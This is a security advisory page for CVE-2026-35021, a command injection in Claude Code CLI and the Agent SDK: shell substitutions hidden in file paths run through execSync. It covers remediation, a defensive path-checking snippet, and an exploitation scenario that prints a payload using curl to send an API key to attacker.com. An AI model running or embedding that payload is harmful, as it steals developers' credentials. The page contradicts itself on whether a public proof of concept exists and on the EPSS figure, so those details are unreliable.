CVE-2026-35021: Claude Code CLI: shell injection enables RCE

Severity: HIGH | PoC available | CISA SSVC: Attend
Published April 6, 2026
CISO Take

CVE-2026-35021 is an OS command injection (CWE-78) in Anthropic's Claude Code CLI and Claude Agent SDK, where malicious file paths containing shell metacharacters ($() or backticks) are interpolated unsafely into execSync calls — POSIX double-quote semantics do not prevent command substitution, so injected expressions are evaluated and executed. While the local attack vector (AV:L) limits opportunistic mass exploitation, the blast radius is significant: Claude Code is actively used by AI developers and security engineers who routinely open untrusted files, and the Agent SDK underpins any custom agentic application built on Anthropic's tooling. The vulnerability is not in CISA KEV and no public exploit exists yet, but low attack complexity (AC:L) with no required privileges means any attacker who can place a crafted file in a developer's workflow gains immediate code execution at the user's privilege level — including access to LLM API keys, cloud credentials, and SSH keys typically present in developer environments. Organizations using Claude Code CLI or building on the Claude Agent SDK should update to the patched release immediately; as an interim control, restrict opening files from untrusted sources and audit any code paths that pass external file paths to the SDK.

Sources: NVD, VulnCheck, ATLAS

What is the risk?

High risk for developer and AI engineering environments. CVSS 7.8 reflects high confidentiality, integrity, and availability impact with low attack complexity and no privilege requirement. The local attack vector constrains internet-scale exploitation, but developer workstations are high-value targets — they hold API keys, cloud credentials, source code, and deployment secrets. Claude Code's user base (AI developers, security engineers) makes the credential exfiltration scenario particularly damaging. No EPSS data, no active exploitation reported, no public PoC — but trivial exploitability means the window between disclosure and weaponization is narrow.

Severity & Risk

CVSS 3.1: 7.8 / 10
EPSS: 0.0% chance of exploitation in 30 days (higher than 12% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

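Attack Vector (AV): Local
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High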

What should I do?

  1. Update: Upgrade Claude Code CLI and Claude Agent SDK to the latest patched release immediately. Check Anthropic's security advisory for the fixed version.

  2. Interim workaround: Avoid opening files whose paths originate from untrusted inputs (user uploads, cloned repositories, downloaded archives) in Claude Code CLI until patched.

  3. SDK consumers: Audit any code using the Claude Agent SDK's prompt editor functionality that accepts external file paths; reject or sanitize paths containing shell metacharacters ($, `, \, ;, |, &) before passing to the SDK.

  4. Detection: Review shell history and process logs for unexpected child processes spawned by node/claude-code processes. Alert on execSync calls with anomalous path arguments in EDR telemetry.

  5. Credential rotation: If exploitation is suspected, immediately rotate all credentials stored in the developer environment — Anthropic API keys, cloud IAM credentials, and SSH keys.
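
One way to implement the step 3 check, and to audit a cloned or unpacked tree before opening files from it (step 2). This is an added example, not Anthropic's or the SDK's code; requireSafePath, auditTree and the sample tree are hypothetical names and constructed data.

```javascript
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// Metacharacters named in step 3: $ ` \ ; | &
// (backslash is a normal separator on Windows; this check assumes POSIX paths)
const SHELL_META = /[$`\\;|&]/;

// Return the first offending character, or null if none is present.
function findShellMeta(filePath) {
  const m = SHELL_META.exec(filePath);
  return m ? m[0] : null;
}

// Guard to call before an externally supplied path is handed to the SDK.
function requireSafePath(filePath) {
  const bad = findShellMeta(filePath);
  if (bad !== null) {
    throw new Error(`rejected path: shell metacharacter ${JSON.stringify(bad)}`);
  }
  return filePath;
}

// Walk a tree and list every entry whose name contains a metacharacter.
function auditTree(root) {
  const findings = [];
  const walk = (dir) => {
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      const full = path.join(dir, entry.name);
      const bad = findShellMeta(entry.name);
      if (bad !== null) findings.push({ path: path.relative(root, full), char: bad });
      // isDirectory() is false for symlinks, so links are not followed.
      if (entry.isDirectory()) walk(full);
    }
  };
  walk(root);
  return findings.sort((a, b) => a.path.localeCompare(b.path));
}

// Constructed sample tree: one clean file, two names with harmless substitutions.
function buildSampleTree() {
  const root = fs.mkdtempSync(path.join(os.tmpdir(), 'path-audit-'));
  fs.mkdirSync(path.join(root, 'docs'));
  fs.writeFileSync(path.join(root, 'docs', 'readme.md'), '');
  fs.writeFileSync(path.join(root, 'docs', 'a$(echo X).md'), '');
  fs.writeFileSync(path.join(root, 'b`echo Y`.txt'), '');
  return root;
}
```

auditTree checks entry names below the root only; if the root directory's own path can come from untrusted input, pass the full path through requireSafePath as well.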

CISA SSVC Assessment

Decision: Attend
Exploitation: poc
Automatable: No
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001: A.6.2 - AI system security
NIST AI RMF: MANAGE-2.4 - Residual risks are managed
OWASP LLM Top 10: LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2026-35021?

CVE-2026-35021 is an OS command injection (CWE-78) in Anthropic's Claude Code CLI and Claude Agent SDK, where malicious file paths containing shell metacharacters ($() or backticks) are interpolated unsafely into execSync calls — POSIX double-quote semantics do not prevent command substitution, so injected expressions are evaluated and executed. While the local attack vector (AV:L) limits opportunistic mass exploitation, the blast radius is significant: Claude Code is actively used by AI developers and security engineers who routinely open untrusted files, and the Agent SDK underpins any custom agentic application built on Anthropic's tooling. The vulnerability is not in CISA KEV and no public exploit exists yet, but low attack complexity (AC:L) with no required privileges means any attacker who can place a crafted file in a developer's workflow gains immediate code execution at the user's privilege level — including access to LLM API keys, cloud credentials, and SSH keys typically present in developer environments. Organizations using Claude Code CLI or building on the Claude Agent SDK should update to the patched release immediately; as an interim control, restrict opening files from untrusted sources and audit any code paths that pass external file paths to the SDK.

Is CVE-2026-35021 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-35021, increasing the risk of exploitation.

How to fix CVE-2026-35021?

  1. Update: Upgrade Claude Code CLI and Claude Agent SDK to the latest patched release immediately. Check Anthropic's security advisory for the fixed version.

  2. Interim workaround: Avoid opening files whose paths originate from untrusted inputs (user uploads, cloned repositories, downloaded archives) in Claude Code CLI until patched.

  3. SDK consumers: Audit any code using the Claude Agent SDK's prompt editor functionality that accepts external file paths; reject or sanitize paths containing shell metacharacters ($, `, \, ;, |, &) before passing to the SDK.

  4. Detection: Review shell history and process logs for unexpected child processes spawned by node/claude-code processes. Alert on execSync calls with anomalous path arguments in EDR telemetry.

  5. Credential rotation: If exploitation is suspected, immediately rotate all credentials stored in the developer environment: Anthropic API keys, cloud IAM credentials, and SSH keys.

What systems are affected by CVE-2026-35021?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI development pipelines, developer tooling.

What is the CVSS score for CVE-2026-35021?

CVE-2026-35021 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.04%.

Technical Details

NVD Description

Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in the prompt editor invocation utility that allows attackers to execute arbitrary commands by crafting malicious file paths. Attackers can inject shell metacharacters such as $() or backtick expressions into file paths that are interpolated into shell commands executed via execSync. Although the file path is wrapped in double quotes, POSIX shell semantics (POSIX §2.2.3) do not prevent command substitution within double quotes, allowing injected expressions to be evaluated and resulting in arbitrary command execution with the privileges of the user running the CLI.
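
The double-quote behaviour described above, as an added example that is not code from Claude Code or the Agent SDK: constructed file names carrying a harmless marker substitution are passed once through a shell command string and once as a single argv element. printf stands in for the editor binary, and the function names are hypothetical.

```javascript
const { execSync, execFileSync } = require('node:child_process');

// Constructed file names; the substitutions only echo a marker string.
const CRAFTED_PATHS = ['notes-$(echo INJECTED).md', 'notes-`echo INJECTED`.md'];

// Pattern from the description: the path is interpolated into a shell command line.
// Double quotes suppress word splitting and globbing, but the shell still
// performs command substitution inside them.
function openViaShell(filePath) {
  return execSync(`printf '%s' "${filePath}"`, { encoding: 'utf8' });
}

// Hardened form: no shell is involved; the path is one argv element and
// reaches the program byte for byte.
function openViaArgv(filePath) {
  return execFileSync('printf', ['%s', filePath], { encoding: 'utf8' });
}

// Report what each form actually handed to the program.
function compare(paths) {
  return paths.map((p) => ({
    path: p,
    shellSaw: openViaShell(p),
    argvSaw: openViaArgv(p),
  }));
}

console.log(compare(CRAFTED_PATHS));
```

In the shell form the program receives notes-INJECTED.md for both names, which shows the substitution ran before the program started; in the argv form it receives the file name unchanged.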

Exploitation Scenario

An adversary targets an AI engineering team by embedding a malicious file path in a shareable artifact — for example, a Git repository containing a file whose path includes a command substitution expression such as $(curl https://attacker.com/exfil?k=$(cat ~/.anthropic/api_key)). When a developer clones the repository and opens the file in Claude Code CLI, or when a custom agentic application built on the Agent SDK invokes the prompt editor against it, the file path is interpolated into an execSync shell command. POSIX shell evaluates the $() expression within the double-quoted string, executing the injected command under the developer's user context. The attacker receives the Anthropic API key — and potentially AWS credentials, SSH keys, or database secrets — exfiltrated to their controlled endpoint, all triggered by a routine developer workflow with no visible indication of compromise.

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published: April 6, 2026
Last Modified: April 29, 2026
First Seen: April 6, 2026
